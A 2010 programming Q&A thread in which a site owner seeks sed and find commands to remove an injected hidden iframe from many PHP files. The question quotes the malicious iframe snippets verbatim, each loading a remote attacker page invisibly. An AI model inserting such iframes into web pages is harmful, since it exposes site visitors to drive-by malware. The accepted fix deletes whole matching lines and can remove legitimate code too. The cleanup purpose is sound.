tags:

views:

124

answers:

5
Q: 

Single Quotes Iframe Virus

Hello,

i am looking for a shell script to remove following code from multiple files:

<iframe hbfww='BoGJMTtZ' src='http://getrelax4you.com/in.cgi?7 ' width='665' height='432' style='display:none'></iframe>

I found scripts to remove iframes but they alle where for code with double quotes

Like this one here:

find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;

i tried escaping the single quotes like this 

find -name "*.php" -exec sed -i 's/<iframe src=\'http:\/\/getrelax4you\/in.cgi?7 \' width=\'665\' height=\'432\' style=\'display:none\'><\/iframe>//' {} \;

but then i get --> syntax error near unexpected token `<'

A: 

You might need to escape the < using a backslash: \< (or \\<, to escape the escape char from the shell)

John Weldon  2010-06-18 17:22:57
i tried both but it doesnt really work, can you post a full command?
AciDRaT  2010-06-18 17:28:26
A: 

Strange, but double quotes on the outside work for me:

find -name "*.php" -exec sed -i "s/<iframe src=\'http:\/\/getrelax4you\/in.cgi?7 \' width=\'665\' height=\'432\' style=\'display:none\'><\/iframe>//" {} \;

But I cannot stop wondering why your command doesn't work. I tried this on bash.

MvanGeest  2010-06-18 17:35:48
hm it runs, but has no affect on my files.
AciDRaT  2010-06-18 17:45:26
OK, how about removing some backslashes? Like the ones that escape the `'` single quotes? Shell quoting is complicated.
MvanGeest  2010-06-18 17:58:47
+1  A:  
cat xyz.php | sed "s/.*BoG.*$//g" > fixedxyz.php

replace the BoG with as much as is necessary to make it unique (the '<' is irrelevant in my search/replace)

KevinDTimm  2010-06-18 17:36:05
this seems to do the trick, thank you. my final code is:find -name "*.php" -exec sed -i "s/.*getrelax.*$//g" {} \;
AciDRaT  2010-06-18 17:46:00
yes, I saw your line after my entry - figured you'd be OK with my form :) Don't forget to upvote/accept....
KevinDTimm  2010-06-18 18:24:06
Though you have a competing answer, I'll do some upvoting for you.
MvanGeest  2010-06-18 18:36:16
Thanks - I just like giving an example that matches in the short pattern - makes understanding the process much easier when you find this happening again in 3 months :)
KevinDTimm  2010-06-18 18:44:54
And, it would have been better if I had chosen 'getrelax4you' as my constant in the regex (for clarity reasons)
KevinDTimm  2010-06-18 18:45:47
May I ask why you didn't do `sed "s/.*BoG.*$//g" < xyz.php > fixedxyz.php`? To show how you could pipe input into `sed`? Or wouldn't this work at all?
MvanGeest  2010-07-28 11:03:26
It's a style thing - I think it makes it clearer to a neophyte when they look at the format I used (it 'reads' left to right). Both are correct though.
KevinDTimm  2010-07-28 12:39:59
A: 

This should work without any escaping:

sed "s|<iframe hbfww='BoGJMTtZ' src='http://getrelax4you.com/in.cgi?7 ' width='665' height='432' style='display:none'></iframe>||"
Dennis Williamson  2010-06-18 17:50:54
A: 

I have the same issue. Is this a hacker or a virus?

is added to almost all my php files and some html files.

Someone please shed some light on this

mike  2010-06-23 11:41:19

related questions

JavaScript interactive shell with completion
Path to Program-Files on remote computer
How to add submenu items to the Windows Explorer context menu?
MySQL shell on Windows
Quoting command-line arguments in shell scripts
How to escape os.system() calls in Python?
Where can I find a graphical command shell?
How to redirect all stderr in bash?
How do you use ssh in a shell script?
Parsing XML using unix terminal
Unix shell file copy flattening folder structure
Is there any way to prevent find from digging down recursively into subdirectories?
Combining values from different files into one CSV file
Is there a Unix utility to prepend timestamps to lines of text?
Why doesn't **find** find anything?
Why shouldn't I "bet the future of the company" on shell scripts?
Opening Explorer shell with admin priveleges on XP (with IE7 installed)
Programatically select multiple files in windows explorer
How do you use PowerShell?
How to resolve symbolic links in a shell script
Date arithmetic in Unix shell scripts
Better windows command line shells
Shell scripting input redirection oddities
Linux shell equivalent on IIS
What should a longtime Windows user know when starting to use Linux?